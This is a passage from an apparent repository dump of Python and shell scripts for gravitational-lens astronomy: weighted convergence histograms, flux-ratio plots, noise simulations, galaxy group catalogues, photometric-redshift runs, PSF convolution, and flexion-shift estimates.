gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \" #, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf) # for asymmetric limits, implement a gaussian on each side\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained # I tested that this addition works correctly\n LOS = LOS + data.size\n\nnp.savetxt(output,unbiased_kappa_constrained,fmt='%s',delimiter='\\t',newline='\\n')\nnp.savetxt(outputLOS,np.array([LOS]),fmt='%s',delimiter='\\t',newline='\\n')\nprint(\" time for computing kappa %s seconds\" % (time.time() - start1))\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment1 = \", increment1\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n print \"increment2 = \", increment2\nif (conjoined == 3) | (conjoined == 4):\n print \"increment3 = \", increment3\nif conjoined == 4:\n print \"increment4 = \", increment4\n\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.5418655276298523, "alphanum_fraction": 0.5904555320739746, "avg_line_length": 27.8125, "blob_id": "c48506ecba5c2556bfdf73eb32887d1db905854e", "content_id": "6f485eee6534a40e3f68a6aa5314f4720bf5c90d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2305, "license_type": "no_license", "max_line_length": 246, "num_lines": 80, "path": "/python/plot_utilities/fluxratiocomplete.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple plot with custom labels\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.clf()\n\nSIS_b = 1.54\nSIS_c = 1.46\nSIS_d = 0.52\nSIS_bc = 1.05\nSIS_db = 0.34\nSIS_dc = 0.36\n\nSIE_b = 1.47\nSIE_c = 1.39\nSIE_d = 0.58\nSIE_bc = 1.06\nSIE_db = 0.39\nSIE_dc = 0.41\n\nG2_b = 2.06\nG2_c = 1.94\nG2_d = 0.96\nG2_bc = 1.06\nG2_db = 0.46\nG2_dc = 0.49\n\ndata = np.loadtxt('fluxratioerr.cat', dtype={'names': ('filter', 'B/A', 'B/Ae', 'C/A', 'C/Ae', 'D/A', 'D/Ae', 'B/C', 'B/Ce', 'D/B', 'D/Be', 'D/C', 'D/Ce'),'formats': ('S2', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4')})\nfilt = [x[0] for x in data]\nb = [x[1] for x in data]\nb_e = [x[2] for x in data]\nc = [x[3] for x in data]\nc_e = [x[4] for x in data]\nd = [x[5] for x in data]\nd_e = [x[6] for x in data]\nbc = [x[7] for x in data]\nbc_e = [x[8] for x in data]\nbd = [x[9] for x in data]\nbd_e = [x[10] for x in data]\ncd = [x[11] for x in data]\ncd_e = [x[12] for x in data]\n\nx=np.linspace(1,len(filt),len(filt))\nplt.xticks(x, filt)\nplt.plot(x, b, label=data.dtype.names[1], color='b')\nplt.errorbar(x, b, yerr=b_e, color='b')\nplt.plot(x, x*0+SIS_b, color='b', linestyle='--')\n#plt.plot(x, x*0+SIE_b, color='b', linestyle=':')\n\nplt.plot(x, c, label=data.dtype.names[3], color='g')\nplt.errorbar(x, c, yerr=c_e, color='g')\nplt.plot(x, x*0+SIS_c, color='g', linestyle='--')\n#plt.plot(x, x*0+SIE_c, color='g', linestyle=':')\n\nplt.plot(x, d, label=data.dtype.names[5], color='r')\nplt.errorbar(x, d, yerr=d_e, color='r')\nplt.plot(x, x*0+SIS_d, color='r', linestyle='--')\n#plt.plot(x, x*0+SIE_d, color='r', linestyle=':')\n\nplt.plot(x, bc, label=data.dtype.names[7], color='m')\nplt.errorbar(x, bc, yerr=bc_e, color='m')\nplt.plot(x, x*0+SIS_bc, color='m', linestyle='--')\n#plt.plot(x, x*0+SIE_bc, color='m', linestyle=':')\n\nplt.plot(x, bd, label=data.dtype.names[9], color='c')\nplt.errorbar(x, bd, yerr=bd_e, color='c')\nplt.plot(x, x*0+SIS_db, color='c', linestyle='--')\n#plt.plot(x, x*0+SIE_db, color='c', linestyle=':')\n\nplt.plot(x, cd, label=data.dtype.names[11], color='y')\nplt.errorbar(x, cd, yerr=cd_e, color='y')\nplt.plot(x, x*0+SIS_dc, color='y', linestyle='--')\n#plt.plot(x, x*0+SIE_dc, color='y', linestyle=':')\n\nplt.xlabel('Filter')\nplt.ylabel('Flux ratio')\nplt.legend()\n\nplt.savefig('fluxratioinversecomplete.eps', dpi=150, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5163464546203613, "alphanum_fraction": 0.5906639695167542, "avg_line_length": 41.925926208496094, "blob_id": "7ea4284a9cd25e3211009b4cb16197651f5c17e4", "content_id": "39b7506c5c92eeeadfb6d64f5aa91709d22f333c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5934, "license_type": "no_license", "max_line_length": 185, "num_lines": 135, "path": "/python/modeling_utilities/simulate.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given an image containing flux from a perfect model, as well as a value for the original (unsubtracted) sky, create an image containing pure Poisson noise, with null sky level\r\n# Careful, the code needs to be updates for each particular input file\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nfrom astropy.io import fits\r\nimport corner\r\n\r\nexptime = 1440 # exposure time\r\nsim = 100 # number of simulations\r\nmodel = \"ilens_out_model.fits\"\r\nsky = 40000 # in case I compute this from the std of sky pixels, I need to do it on the subtracted best-fit image\r\nfile = \"ilens_out_file_simulated.input\"\r\n\r\nfor i in range(sim):# sim\r\n \r\n # simulate noisy image\r\n image = fits.open(model)\r\n data = image[0].data\r\n data = data + sky\r\n noise = np.random.poisson(data)\r\n noise = noise - sky\r\n image[0].data = noise.astype(\"float32\") # Hostlens expects this\r\n image.writeto(model[:-5]+\"_noise.fits\",clobber=True)\r\n \r\n # redirect the output\r\n with open(file, 'r') as f:\r\n hostlens = f.readlines()\r\n hostlens[5 - 1] = \"prefix %s\" % file[:-6] + str(i+1) + \"\\n\"\r\n if i == 0:\r\n hostlens[24 - 1] = \"dump_subtract 1 \\n\"\r\n else:\r\n hostlens[24 - 1] = \"dump_subtract 0 \\n\"\r\n if i == sim - 1:\r\n pixscale = float(hostlens[6 - 1].split()[1])\r\n # update these:\r\n init1 = float(hostlens[43 - 1].split()[1]) * pixscale\r\n init2 = float(hostlens[44 - 1].split()[1]) * pixscale\r\n init3 = 25 - 2.5*np.log10(float(hostlens[50 - 1].split()[1])/exptime)\r\n init4 = float(hostlens[54 - 1].split()[1]) * pixscale\r\n init5 = float(hostlens[55 - 1].split()[1]) * pixscale\r\n init6 = 25 - 2.5*np.log10(float(hostlens[61 - 1].split()[1])/exptime)\r\n init7 = float(hostlens[65 - 1].split()[1]) * pixscale\r\n init8 = float(hostlens[66 - 1].split()[1]) * pixscale\r\n init9 = 25 - 2.5*np.log10(float(hostlens[72 - 1].split()[1])/exptime)\r\n init10 = float(hostlens[76 - 1].split()[1]) * pixscale\r\n init11 = float(hostlens[77 - 1].split()[1]) * pixscale\r\n init12 = 25 - 2.5*np.log10(float(hostlens[83 - 1].split()[1])/exptime)\r\n init13 = float(hostlens[87 - 1].split()[1]) * pixscale\r\n init14 = float(hostlens[88 - 1].split()[1]) * pixscale\r\n init15 = 25 - 2.5*np.log10(float(hostlens[89 - 1].split()[1])/exptime)\r\n with open(file, 'w') as f:\r\n f.writelines(hostlens)\r\n f.close()\r\n\r\n os.system(\"hostlens %s\" % file)\r\n\r\n# update number of parameters according to input\r\npar1 = np.zeros(sim)\r\npar2 = np.zeros(sim)\r\npar3 = np.zeros(sim)\r\npar4 = np.zeros(sim)\r\npar5 = np.zeros(sim)\r\npar6 = np.zeros(sim)\r\npar7 = np.zeros(sim)\r\npar8 = np.zeros(sim)\r\npar9 = np.zeros(sim)\r\npar10 = np.zeros(sim)\r\npar11 = np.zeros(sim)\r\npar12 = np.zeros(sim)\r\npar13 = np.zeros(sim)\r\npar14 = np.zeros(sim)\r\npar15 = np.zeros(sim)\r\n\r\nfor i in range(sim):\r\n with open(file[:-6] + str(i+1) + \"_optresult.dat\", 'r') as f:\r\n hostlens = f.readlines()\r\n # updte these:\r\n par1[i] = float(hostlens[0 - 7].split()[1]) * pixscale # -7 if there are 5 objects of interest\r\n par2[i] = float(hostlens[0 - 7].split()[2]) * pixscale\r\n par3[i] = 25 - 2.5*np.log10(float(hostlens[0 - 7].split()[8])/exptime)\r\n par4[i] = float(hostlens[0 - 6].split()[1]) * pixscale\r\n par5[i] = float(hostlens[0 - 6].split()[2]) * pixscale\r\n par6[i] = 25 - 2.5*np.log10(float(hostlens[0 - 6].split()[8])/exptime)\r\n par7[i] = float(hostlens[0 - 5].split()[1]) * pixscale\r\n par8[i] = float(hostlens[0 - 5].split()[2]) * pixscale\r\n par9[i] = 25 - 2.5*np.log10(float(hostlens[0 - 5].split()[8])/exptime)\r\n par10[i] = float(hostlens[0 - 4].split()[1]) * pixscale\r\n par11[i] = float(hostlens[0 - 4].split()[2]) * pixscale\r\n par12[i] = 25 - 2.5*np.log10(float(hostlens[0 - 4].split()[8])/exptime)\r\n par13[i] = float(hostlens[0 - 3].split()[1]) * pixscale\r\n par14[i] = float(hostlens[0 - 3].split()[2]) * pixscale\r\n par15[i] = 25 - 2.5*np.log10(float(hostlens[0 - 3].split()[3])/exptime)\r\n #os.system(\"rm %s\" % (file[:-6] + str(i+1) + \"_optresult.dat\"))\r\n\r\n# updte these:\r\nstd1 = np.sqrt(np.sum((par1 - init1)**2)/(sim - 1))\r\nstd2 = np.sqrt(np.sum((par2 - init2)**2)/(sim - 1))\r\nstd3 = np.sqrt(np.sum((par3 - init3)**2)/(sim - 1))\r\nstd4 = np.sqrt(np.sum((par4 - init4)**2)/(sim - 1))\r\nstd5 = np.sqrt(np.sum((par5 - init5)**2)/(sim - 1))\r\nstd6 = np.sqrt(np.sum((par6 - init6)**2)/(sim - 1))\r\nstd7 = np.sqrt(np.sum((par7 - init7)**2)/(sim - 1))\r\nstd8 = np.sqrt(np.sum((par8 - init8)**2)/(sim - 1))\r\nstd9 = np.sqrt(np.sum((par9 - init9)**2)/(sim - 1))\r\nstd10 = np.sqrt(np.sum((par10 - init10)**2)/(sim - 1))\r\nstd11 = np.sqrt(np.sum((par11 - init11)**2)/(sim - 1))\r\nstd12 = np.sqrt(np.sum((par12 - init12)**2)/(sim - 1))\r\nstd13 = np.sqrt(np.sum((par13 - init13)**2)/(sim - 1))\r\nstd14 = np.sqrt(np.sum((par14 - init14)**2)/(sim - 1))\r\nstd15 = np.sqrt(np.sum((par15 - init15)**2)/(sim - 1))\r\n\r\n# updte these:\r\nprint \"std 1: \", std1, \" [arcsec]\"\r\nprint \"std 2: \", std2, \" [arcsec]\"\r\nprint \"std 3: \", std3, \" [dmag]\"\r\nprint \"std 4: \", std4, \" [arcsec]\"\r\nprint \"std 5: \", std5, \" [arcsec]\"\r\nprint \"std 6: \", std6, \" [dmag]\"\r\nprint \"std 7: \", std7, \" [arcsec]\"\r\nprint \"std 8: \", std8, \" [arcsec]\"\r\nprint \"std 9: \", std9, \" [dmag]\"\r\nprint \"std 10: \", std10, \" [arcsec]\"\r\nprint \"std 11: \", std11, \" [arcsec]\"\r\nprint \"std 12: \", std12, \" [dmag]\"\r\nprint \"std 13: \", std13, \" [arcsec]\"\r\nprint \"std 14: \", std14, \" [arcsec]\"\r\nprint \"std 15: \", std15, \" [dmag]\"\r\n\r\n# update the length:\r\n#data = np.c_[par1,par2,par3,par4,par5,par6,par7,par8,par9,par10,par11,par12,par13,par14,par15]\r\n#figure = corner.corner(data, labels=np.linspace(1,np.shape(data)[0],np.shape(data)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\n#figure.savefig(file[:-6] + \"_simulations.png\", dpi=100)\r\n# ignore any WARNING:root:Too few points to create valid contours\r\n\r\n\r\n" }, { "alpha_fraction": 0.587837815284729, "alphanum_fraction": 0.633357048034668, "avg_line_length": 47.465518951416016, "blob_id": "7db1a8a4abe6f7720812483637fea96ee550820c", "content_id": "bfd90da5ab7c5d39bed3ff8779d7b9037dcfcd8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2812, "license_type": "no_license", "max_line_length": 192, "num_lines": 58, "path": "/python/catalogue_utilities/MSgroups.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport os\nfrom stellarpop import distances\n\nmingroup = 5 # I would normally use minimum number of members of any group spectroscopically identified by Dominique in the real data, but that is problematic due tot different sigma_8\nmingrouplimmag = 5\nmagmingroup = 25.5\nh = 0.73 # MS\nomegaL = 0.75\nomega0 = 0.25\nzs = 1.662\nzl = 0.661\nthetaL = 0.95 # COSMOGRAIL VII\ndist = distances.Distance()\ndist.OMEGA_M = omega0\ndist.OMEGA_L = omegaL\ndist.h = h\ndef fbeta(z,zs,zl,dist):\n beta = (dist.angular_diameter_distance(zl, z) * dist.angular_diameter_distance(zs)) / (dist.angular_diameter_distance(z) * dist.angular_diameter_distance(zl, zs))\n if z > zl: return (1-beta)**2\n else: return 1\n# indices\nhalo = 0\nspecz = 1\nposx = 2\nposy = 3\nmhalo = 4\nimag = 5\n\nos.system('rm -f /Users/cerusu/Dropbox/Davis_work/code/WFI2033/8_0_0groups.cat')\nf = open(\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/8_0_0groups.cat\", \"a\")\nroot = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\nlst = [x for x in os.listdir(root) if (('GGL_los_8_0_0' in x) and ('_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt' in x))]\n#print lst[0]\nnr = 0\nfor j in range(len(lst)):\n print j+1,'/',16\n cat = np.loadtxt(root+lst[j],usecols=[1,5,6,7,9,15],comments='GalID')\n catobs = cat[cat[:,imag] <= magmingroup]\n haloID = np.unique(catobs[:,halo],return_counts=True)\n groupID = haloID[0][np.where(haloID[1] >= mingrouplimmag)]\n if j == 0: f.write(\"# nr galcount posx posy logMhalo specz veldisp thetaE radius \\n\")\n for i in range(len(groupID)):\n if len(cat[:,halo][cat[:,halo] == groupID[i]]) > mingroup:\n nr += 1\n mhalogroup = np.max(cat[:,mhalo][cat[:,halo] == groupID[i]])\n speczhalo = np.mean(cat[:,specz][cat[:,halo] == groupID[i]])\n sigma = (np.sqrt(omegaL + omega0 * (1+speczhalo)**3) * (mhalogroup/h) / 1200000) ** (1.0/3) # eq. 10 from Finn et al. 2005\n posxgroup = np.mean(cat[:,posx][cat[:,halo] == groupID[i]])\n posygroup = np.mean(cat[:,posy][cat[:,halo] == groupID[i]])\n Dgs = dist.angular_diameter_distance(speczhalo, zs)\n Ds = dist.angular_diameter_distance(zs)\n thetaE = Dgs/Ds * 30 * (sigma/1000) ** 2 # https://ned.ipac.caltech.edu/level5/Mellier/Mellier2_3.html in arcsec\n radius = (((thetaE * thetaL) ** 2) * fbeta(speczhalo,zs,zl,dist)/0.0001) ** (1.0/3) # arcsec\n str = '%d %d %.8f %.8f %.2f %.4f %.2f %.2f %.2f \\n' %(nr, len(cat[:,halo][cat[:,halo] == groupID[i]]), posxgroup, posygroup, np.log10(mhalogroup), speczhalo, sigma, thetaE, radius)\n #print nr, len(cat[:,halo][cat[:,halo] == groupID[i]]), posxgroup, posygroup, np.log10(mhalogroup), speczhalo, sigma, thetaE, radius\n f.write(str)\nf.close()\n" }, { "alpha_fraction": 0.6765799522399902, "alphanum_fraction": 0.7038413882255554, "avg_line_length": 23.393939971923828, "blob_id": "ff390beb1c9e08e206359239f3c819580bae0042", "content_id": "b2bc5cf6b3f3ca0380eacf8bad2d7a9d4ca132c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 807, "license_type": "no_license", "max_line_length": 139, "num_lines": 33, "path": "/python/config_utilities/runlephare_phys_para_CFHTLS.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#! /bin/sh\n#Script to run lephare\n#usage: runlephare.sh file\n\nLEPHAREDIR=$HOME/lephare_dev\nPARA=$HOME/lephare_dev/config/lephare_CFHTLenS.para\n\nLEPHAREWORK=$HOME/lephare_dev/work\n\nexport LEPHAREDIR\nexport LEPHAREWORK\n\nLIBR=MAG_BC03_I09\n\nFILEIN=$1\nFILEOUT=${FILEIN%.lepharein}.${LIBR}.lephareout\n\n#Select the correct options depending on \n#the \"i\" band. i:old one(4th filter), y:new one(5th filter).\nif [[ \"${FILEIN}\" =~ \"izrgu\" ]]\nthen\n OPTIONS=\"-NZ_PRIOR 4,2,4 -MAG_REF 4 -MABS_REF 4 -ZMAX_FILT 4\"\nfi\nif [[ \"${FILEIN}\" =~ \"yzrgu\" ]]\nthen\n OPTIONS=\"-NZ_PRIOR 5,2,5 -MAG_REF 5 -MABS_REF 5 -ZMAX_FILT 5\"\nfi\n\necho \"Computing physical parameters\"\n\nrm -f $FILEOUT\n\n$LEPHAREDIR/source/zphota -c $PARA $OPTIONS -CAT_IN $FILEIN -CAT_OUT $FILEOUT -ZPHOTLIB $LIBR,MAG_STAR,MAG_QSO -ZFIX yes -ZMAX_MAGLIM 24.0\n\n\n" }, { "alpha_fraction": 0.7406049370765686, "alphanum_fraction": 0.7589367628097534, "avg_line_length": 40.94230651855469, "blob_id": "6a007eb2e7bc6b41c13901dbc680e9446fc5f141", "content_id": "bcbb1d2e0127b54fbfe4b85f22d4046547190c85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2182, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/python/image_utilities/convolution.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Code to convolve an image with a kernel, such as produced by py_mk-kernels.py\n\nfrom astropy.io import fits\nfrom scipy import signal\n\nim=fits.open(\"FINALweighted_u_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-u_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_u_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_r_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-r_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_r_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_i_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-i_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_i_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_z_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-z_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_z_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALweighted_Y_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-Y_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALweighted_Y_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALHEADmedian_J_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-J_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALHEADmedian_J_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALHEADmedian_H_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-H_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALHEADmedian_H_covernolens_matchg.fits', clobber=0)\n\nim=fits.open(\"FINALHEADmedian_Ks_covernolens.fits\")\nkernel_hybrid=fits.open(\"kernel_g-Ks_hybrid.fits\")\nconv = signal.convolve2d(im[0].data, kernel_hybrid[0].data, mode='same')\nim[0].data=conv\nim.writeto('FINALHEADmedian_Ks_covernolens_matchg.fits', clobber=0)\n\n" }, { "alpha_fraction": 0.46751824021339417, "alphanum_fraction": 0.5481751561164856, "avg_line_length": 57.12765884399414, "blob_id": "2274ecf291fdebd55acefd438f6923b87c0eebd2", "content_id": "3b7db2b6e2956c104d457a575dc49a9ac463cf2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2740, "license_type": "no_license", "max_line_length": 255, "num_lines": 47, "path": "/python/modeling_utilities/mcmc_einstmagniftimesrc.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Uses an existent glafic MCMC chain to plot corresponding distributions for the einstein radius, time delays and magnifications\n# run in a fresh terminal, because I need to save the terminal output to disk\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nfile = \"pointSIEgamma.input\"\nfileout = \"out_SIEgammafield_einstmagniftime_point.dat\"\nchains = 10\r\nlength = 10000\nz_s = 2.517\nimg = 4\n\nfor i in range(chains):\n mcmc = np.loadtxt(file[:-6] + str(i+1) + \"_mcmc.dat\",unpack=True)\n mcmci = mcmc[1:,int(np.shape(mcmc)[1]/4):np.shape(mcmc)[1]] # eliminate the first column, containing chi^2, as well as the first 25% of the chains\n if i == 0: mcmcfinal = mcmci\n else: mcmcfinal = np.append(mcmcfinal,mcmci, axis = 1)\nmcmclength = np.shape(mcmcfinal)[1]\ninterval = mcmclength / length\n\nfor i in range(length):\n if interval * i < mcmclength:\n print 'step', i+1\n os.system(\"cp %s %s\" % (file,file[:-6] + \"_einstmagniftime.input\"))\n with open(file[:-6] + \"_einstmagniftime.input\", 'r') as f:\n glafic = f.readlines()\n glafic[10 - 1] = \"prefix %s \\n\" % (fileout[:-10])\n glafic[28 - 1] = \"lens sie %s %s %s %s %s 0.000000e+00 0.000000e+00 \\n\" % (mcmcfinal[:,interval * i][0],mcmcfinal[:,interval * i][1],mcmcfinal[:,interval * i][2],mcmcfinal[:,interval * i][3],mcmcfinal[:,interval * i][4])\n if img == 4: glafic[29 - 1] = \"lens pert %s %s %s %s %s 0.000000e+00 0.000000e+00 \\n\" % (z_s,mcmcfinal[:,interval * i][5],mcmcfinal[:,interval * i][6],mcmcfinal[:,interval * i][7],mcmcfinal[:,interval * i][8])\n if img == 2: glafic[29 - 1] = \"lens pert %s %s %s 0.000000e+00 0.000000e+00 0.000000e+00 0.000000e+00 \\n\" % (z_s,mcmcfinal[:,interval * i][5],mcmcfinal[:,interval * i][6])\n glafic[21 - 1] = \"chi2_checknimg 1 \\n\"\n glafic[36 - 1] = \"0 0 0 0 0 0 0 \\n\"\n glafic[37 - 1] = \"0 0 0 0 0 0 0 \\n\"\n glafic[51 - 1] = \"\\n\"\n with open(file[:-6] + \"_einstmagniftime.input\", 'w') as f:\n f.writelines(glafic)\n f.close()\n os.system(\"glafic %s\" % (file[:-6] + \"_einstmagniftime.input\"))\n x = np.loadtxt(fileout)\n if x[0][0] == img:\n with open(file[:-6] + \"_einstmagniftime_out_.dat\", 'a') as f:\n if img == 4: f.write(\"%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s \\n\" % (x[0][0],x[0][2],x[0][3],x[1][0],x[1][1],x[1][2],x[1][3],x[2][0],x[2][1],x[2][2],x[2][3],x[3][0],x[3][1],x[3][2],x[3][3],x[4][0],x[4][1],x[4][2],x[4][3]))\n if img == 2: f.write(\"%s %s %s %s %s %s %s %s %s %s %s \\n\" % (x[0][0],x[0][2],x[0][3],x[1][0],x[1][1],x[1][2],x[1][3],x[2][0],x[2][1],x[2][2],x[2][3]))\n f.close()\n" }, { "alpha_fraction": 0.5121499300003052, "alphanum_fraction": 0.5928747653961182, "avg_line_length": 34.9555549621582, "blob_id": "ded93300a03a3d51e258f423b883b06506383233", "content_id": "2762e6190b3907182b0bf9222f4344743a22638b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4856, "license_type": "no_license", "max_line_length": 270, "num_lines": 135, "path": "/python/catalogue_utilities/flexionshift.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# calculates flexion shift given a catalogue of stellar masses, redshifts and positions on the sky. Check Behroozi et al 2010, Auger et al 2009 and Jabran Zahid et al 2017 for the applicability of the formulas.\n# To produce the input, run awk '{if (($5<=23) && ($98>=0)) print $1,$2,$3,$4,$5,$6,$29,$30,$31,$41,$86,$87,$88,$89}' rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat > WFI2033gal_KenDominique.cat\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nimport distances\n\n####################\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = 12.35\nM1a_ = 0.28\nMs00_ = 10.72\nMs0a_ = 0.55\nb0_ = 0.44\nba_ = 0.18\nd0_ = 0.57\nda_ = 0.17\ng0_ = 1.56\nga_ = 2.51\n# z >= 1:\nM10 = 12.27\nM1a = -0.84\nMs00 = 11.09\nMs0a = 0.56\nb0 = 0.65\nba = 0.31\nd0 = 0.55\nda = -0.12\ng0 = 1.12\nga = -0.53\n\n####################\n# Auger et al 2009 parameters:\na_aug = 0.23\nb_aug = 0.14\n\n####################\n# Jabran Zahid et al 2017 parameters:\nsb = 10**(2.07)\nMb = 10**(10.26)\na1 = 0.403\na2 = 0.293\n\n####################\nlens = SkyCoord('20:33:42.16 -47:23:44.20', frame='fk5', unit=(u.hourangle, u.deg)) # center of the lensing galaxy\nz_s = 1.66\nz_d = 0.66\ntheta_lens = 0.96 # arcsec # Einstein radius from the Vuissoz et al. 2008 SIE+gamma model\ndist = distances.Distance()\ndist.OMEGA_M = 0.31 # Planck\ndist.OMEGA_L = 0.69 # Planck\ndist.h = 0.68 # Planck\nD_S = dist.angular_diameter_distance(0,z_s) # in Mpc\nD_DS = dist.angular_diameter_distance(z_d,z_s)\n\n\n\nconst = 9.626*(10**(-20)) # 4GM_sol/c^2 in Mpc\nradinsec = 206265 # radian in arcsec\n\n\n# read from file\nra_ = 2\ndec_ = 3\nz_b_ = 6\nspec_ = 9\nmstarbest_ = 10\nmstarmed_ = 12\n\nfile = \"WFI2033gal_KenDominique.cat\"\nra,dec,z_b,spec,mstarbest,mstarmed,sep,flex_halo,flex_sluse,flex_zahid = np.loadtxt(file,usecols=[ra_,dec_,z_b_,spec_,mstarbest_,mstarmed_,ra_,ra_,ra_,ra_],unpack=True)\nmstarmed[mstarmed < 0] = mstarbest[mstarmed < 0]\nmstar = mstarmed\nmstar_sluse = mstar - np.log10(0.55) # convert to Salpeter, but only for Auger et al 2009 (Sluse), becasue I computed the masses assuming Chabrier, and so did Zahid et al.\nsigma_zahid = np.zeros(len(mstar))\nz_b[spec>0] = spec[spec>0]\n\nfor i in range(len(ra)):\n coord=SkyCoord(ra=ra[i]*u.degree, dec=dec[i]*u.degree, frame='fk5')\n sep_lens = coord.separation(lens).arcsec\n sep[i] = sep_lens\n z = z_b[i]\n a = 1 / (1 + z)\n if z <= 1:\n logM1a = M10_ + M1a_ * (a - 1)\n logMs0a = Ms00_ + Ms0a_ * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0_ + ba_ * (a-1)\n d = d0_ + da_ * (a-1)\n g = g0_ + ga_ * (a-1)\n mhalo = logM1a + b * (mstar[i] - logMs0a) + ((10 ** mstar[i]/notlogMs0a)**d)/(1+(10 ** mstar[i]/notlogMs0a)**(-g)) - 